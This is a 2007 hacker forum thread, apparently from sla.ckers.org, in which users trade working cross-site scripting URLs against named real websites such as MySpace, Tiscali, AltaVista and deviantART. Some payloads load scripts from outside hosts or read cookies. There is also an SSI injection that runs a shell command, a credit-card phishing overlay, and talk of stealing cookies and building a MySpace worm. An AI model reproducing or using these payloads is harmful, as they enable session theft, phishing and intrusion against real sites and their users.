Quote

although they may have popped up on the server?

No, that simply wouldn't happen, the server has no clue where to even start parsing a file.
I'm glad you have fixed the issue.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

http://www.tiscali.co.uk/search/results.php?section=&from=&query=%3C%2Fb%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E

This is some strange xss, the alert box pops up but with nothing in it, if you check the source code you can see that in all places apart from one the < > and appended to lt & gt yet they've left one place open. Anyway for those of you who aren't English this is quite a major ISP.

http://search-dyn.tiscali.de/search.php?key=%3C%2Fb%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&collection=de&collapse=on&language=de&hits=10&tiscalitype=web&pg=1&offset=0&external=1&spell=suggest

Its german counterpart.



Edited 1 time(s). Last edit at 01/06/2007 08:47AM by eyeced.

get your second side inside SecondLife ...

https://secure-web6.secondlife.com/account/login.php?type=second-life-member&nextpage=/42%22%3E%3Ciframe%20src=%22http://ha.ckers.org/images/stallowned.jpg%22%20width=300%20height=%22500

This site has countless XSS holes, prints the password in the returned form if you passed something wrong, returns server errors when feed with unexpected data, etc. etc.
A Showcase for your Imagination (to use their words;-)
I guess it's worth to open its own thread here, if someone diggs deeper ...



Edited 1 time(s). Last edit at 01/06/2007 02:01PM by kirke.

This is really the weirdest XSS i've seen. it uses a part of the searchresult and alert('ok') *_*

http://www.excite.co.uk/search/web/results/?qs=2066&q=%22%3E%3C%22%3E%3Cscript%3E%3Cscript%3Ealert&c=

Ok no XSS but who needs? I just put a layer on top of AltaVista:

http://uk.altavista.com/audio/results?itag=ody&q=%22%3E%3C%2Ftitle%3E%3Cdiv+style%3D%22position%3Aabsolute%3Bwidth%3A600%3Btop%3A100%3Bleft%3A300%3Bheight%3A400px%3Bz-index%3A10%3B+padding%3A5px%3B+background-color%3Ared%3Bopacity%3A.50%3Bfilter%3Aalpha%28opacity%3D50%29%3B-moz-opacity%3A0.5%3Bborder%3A1px+solid+black%3Bfont-family%3Averdana%3Bcolor%3Ablack%3B+text-align%3Acenter%3B%22%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%3Ctitle%3E&maf=mp3&maf=wav&maf=msmedia&maf=realmedia&maf=aiff&maf=other&mad=all

Or we could take a day off to phish:

http://uk.altavista.com/audio/results?itag=ody&q=%22%3E%3C%2Ftitle%3E%3Cdiv+style%3D%22position%3Aabsolute%3Bwidth%3A800px%3Btop%3A100%3Bleft%3A200%3Bheight%3A500px%3Bz-index%3A10%3B+padding%3A5px%3B+background-color%3Ared%3Bborder%3A1px+solid+black%3Bfont-family%3Averdana%3Bcolor%3Ablack%3Btext-align%3Acenter%3B%22%3E%0D%0A%3Ch1%3E+Give+me+your+creditcard+number+so+we+can+buy+stuff%21%3C%2Fh1%3E%0D%0A%3Cbr%3E%3Cbr%3E%0D%0A%3Cform+name%3D%22bla%22+action%3D%22bla.php%22+method%3D%22post%22%3E%3Cbr%3E%0D%0AName%3A%3Cbr%3E%0D%0A%3Cinput+type%3D%22text%22+size%3D%2250%22%3E%3Cbr%3E%0D%0AAdres%3A%3Cbr%3E%0D%0A%3Cinput+type%3D%22text%22+size%3D%2250%22%3E%3Cbr%3E%0D%0ACreditcard+number%3A%3Cbr%3E%0D%0A%3Cinput+type%3D%22text%22+size%3D%2250%22%3E%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cinput+type%3D%22submit%22+name%3D%22submit%22+style%3D%22width%3A200px%3Bheight%3A100px%3Bsize%3A24%3B%22+value%3D%22SEND%21%22%3E%0D%0A%3C%2Fform%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%3Ctitle%3E&maf=mp3&maf=wav&maf=msmedia&maf=realmedia&maf=aiff&maf=other&mad=all

Good stuff.

jungsonn, why a layer?
does a iframe not work?

Sure it would work only if would be placed just under the <title> where the flaw is., a div layer is quickly positioned

MySpace...

http://myspace.com/Modules/Search/Pages/Search.aspx?fuseaction=advancedFind.results&t=');alert('XSS%20kthxbye

@SystemOfAHack

Nice find - cross browser XSS vun in myspace. Hopefully we can see some type of worm come out of it.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Hah thx, I tested it with a few willing victims and it steals cookies nicely. Don't know about worm. I tried embedding a getURL() in an SWF but i think a recent update means not even allowNetworking=internal works...

Very nice find, SystemOfAHack!

- RSnake
Gotta love it. http://ha.ckers.org

[Kthx again.] I don't know if this belongs here [as the thread seems based on xss (>html)] but here's another thing I found much time ago... I never really mentioned it until the other day and don't want someone else taking credit... :p

http://images.com/SwishSearch?whichindex=&Keywords=%3C%21--%23exec+cmd%3D%22ls%22--%3E&max_res=25&searchinclude=illustration&searchinclude=photography&searchinclude=rp&searchinclude=rf&color=color&color=gray&searchinclude=vertical&searchinclude=horizontal

SHTML; nasty one that... half the crap after the (GET) injection part probs isn't necessary but there you are anyway. I suppose you can then use <!--#include--> or cmd="cat" from there, amongst certain others... :D

SSI injection, rarely found in modern web sites, nice finding :-)

Wow, that's amazing, SystemOfAHack. That is literally the very first example of SSI injection I've ever seen outside of a lab environment, ever. Amazing!

- RSnake
Gotta love it. http://ha.ckers.org

Meh, just a simple little one this time. Pulled a random page from google to see what I could come up with. Disabled a JS redirect to find:

http://jobs.collegegrad.com/JS/Content/KeepLooking.asp?i1=%22%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cplaintext

A terribly unfiltering asp (from what I can tell, it filters nothing). Got annoyed with redirect so I plaintext'd the HTML... I'll try come up with something better in the morning. *yawn*
I heard there was an xss in gmail, so I'm on the hunt for that. But they seem to have themselves well-covered...

lolz.. some quickies:

http://uploading.com/search.php?q=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Flockdown.nearfreehosting.com%2Fxss.js%3E%3C%2Fscript%3E+&go.x=0&go.y=0&go=1
http://dictionary.law.com/default2.asp?typed=%22%3E%3Cscript%3Ealert%28%27hai%27%29%3B%3C%2Fscript%3E&type=1&submit1.x=0&submit1.y=0&submit1=Look+up
https://secure.mytemplatestorage.com/join.php?fname=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cspanlt2.asp?typed=%22%3E%3Cscript%3Ealert%28%27hai%27%29%3B%3C%2Fscript%3E&type=1&submit1.x=0&submit1.y=0&submit1=Look+up
http://www.ebgames.com/search.asp?Ntk=TitleKeyword&Ntx=mode%2Bmatchallpartial&Ntt=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&N=0&find.x=0&find.y=0&find=Search

oo oo oo one more!

http://onelook.com/?w=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Eadlkfj&ls=a



Edited 3 time(s). Last edit at 01/10/2007 07:16PM by Lockdown.

Haha, seems that images.com is down. Either someone's very irresponsible or images.com just so happened to realise they had an SSI injection right around the time I posted about it... hmm; I guess I should have just kept it private.

#edt - OK, since I posted that SSI vuln images.com hasn't been accessible, but www.images.com is. Did I post it wrong in the first place or something?... If so, I was tired



Edited 1 time(s). Last edit at 01/11/2007 06:58PM by SystemOfAHack.

No url for this one.

Adultspace.com seems to have now atleast tried to filter user input a litte this time. <script> gets completely removed but if you put in <s\0cr\0ipt> it gets filtered to <script> and it'll execute.

Theres probably a few other ways to bypass it as well.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Luny Wrote:
-------------------------------------------------------
> No url for this one.
>
> Adultspace.com seems to have now atleast tried to
> filter user input a litte this time. gets
> completely removed but if you put in it gets
> filtered to and it'll execute.
>
> Theres probably a few other ways to bypass it as
> well.

Why no Url? Didn't manage to find a XSS within the first few secs but I did find a sql injection problem and it seems pretty nasty ;)



Edited 1 time(s). Last edit at 01/10/2007 10:22PM by malorn.

malorn Wrote:

> Why no Url? Didn't manage to find a XSS within the
> first few secs but I did find a sql injection
> problem and it seems pretty nasty ;)


eh, I was tired :P
I think i found that nasty sql injection problem you mentioned tho.

Heres a XSS link tho for em

www.adultspace.com/index.php?action=search&type=&user_sex=Female&user_dating=&user_smoke=&user_drink=&country_id=0&user_job=&user_religion=&display=&radius=&user_zip=&user_email=&user_orientation=">">">">"><BR><BR><BR><BR><img%20src=lol.jpg><"<"<"<"&">">">">"><<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

heres another
http://www.nwom.net/topsites/index.php?o=<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>

input forms for comments are vulnerable too ^^.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

http://www.tagdeaf.com/browse.php?update=ok&sub_section=&job=&smoke=&drink=&religion=&sex=&dating=&body_type=&gender=&location=&display=&afrom=&ato=&stringType=user&string=%22%3E%3Cimg%20src=a%20onerror=alert(/xss/);%3E

Started playing this browser based mmorpg yesterday:

http://phantasyrpg.com/search.php?search=<script>alert(document.cookie)</script>

I told one of the coders about one regarding sending in game mail to players that disclose cookie info from a xss too. He fixed that one pretty quick.

I kinda like this game so i think i'll be good :P

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Eh Oh El

http://prints.deviantart.com/?catpath=photography&order=9&q=%22%3E%3Cscript+src%3D//ha.ckers.org/s.js?%3E%3C%2Fscript%3E+

In the store too.. hella phishing oppurtunities and shnap.

http://www.google.com/support/pack/?hl=en&gl=hk%27%29;alert%28String.fromCharCode%2888,83,83%29%29;//

Obscure XSS, click the Google Pack logo.

P.S. I am glad that I can connect here with normal speed again.

- Hong

since i don't really think myspace deserves a 7th thread (plus it's unrelated to filter evasion), it's going back here..

This requires SE as they have to click the 'Click Here' button.. i went ahead and added a convincing sentence that can be combined with a worm pm'ing people about free Premier MySpace accounts if they go there and change the address to their own..

http://collect.myspace.com/index.cfm?page=MyspaceVideoSweepstakes&fuseaction=misc.contactConfirm&emailAddress=jjhendrix@gmail.com%20to%20confirm%20your%20free%20Premium%20MySpace%20account.%20A%20passcode%20will%20be%20included%20redeem%20your%20winning%20account.&collectAdditionalInfo=false&numberPagesBack=0);alert(document.cookie);//&contactOrigin=1&isInappropriateContentMsg=0&inappropriateContentLink=&Mytoken=C1A6DCFE-D3BB-434E-96524CC585408C0F27833414

Creativity is all that's still required..

-maluc

impressive as usually hong.. good work.

-maluc

from Luny's disclosure under Redirect's Edition

http://www.webmd.com/click2.asp?redirect=javascript:alert('XSS')

it's a meta redirect

-maluc

@hong

Wow, just wow.. as they say; legends may sleep, but they never die()

:D